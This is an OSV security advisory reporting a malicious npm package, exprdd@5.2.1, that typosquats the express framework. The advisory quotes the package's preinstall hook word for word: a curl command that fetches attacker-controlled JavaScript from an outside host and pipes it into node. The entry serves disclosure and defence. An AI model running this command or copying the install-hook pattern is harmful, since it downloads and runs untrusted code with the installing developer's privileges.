OSV ID
MAL-2026-17241
Ecosystem
npm
Summary
exprdd@5.2.1 impersonates the express framework — package name, description, author, contributors, repository, homepage, and keywords are copied verbatim from express. package.json declares a preinstall lifecycle hook: "curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node". On npm install, this fetches JavaScript from a third-party host (codeberg.org/hellscripter/install-scripts, proxied through web.archive.org) and pipes it directly into node. The fetched code is attacker-controlled, unpinned (mutable main branch), and unverified, and executes with the installer's privileges before any package code is required. The typosquat name is the delivery vector for developers mistyping express.
Source: amazon-inspector (4cd27ec488e87cd2e26c940ac161033475731708a3f2ae629c4a138275b520f9)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.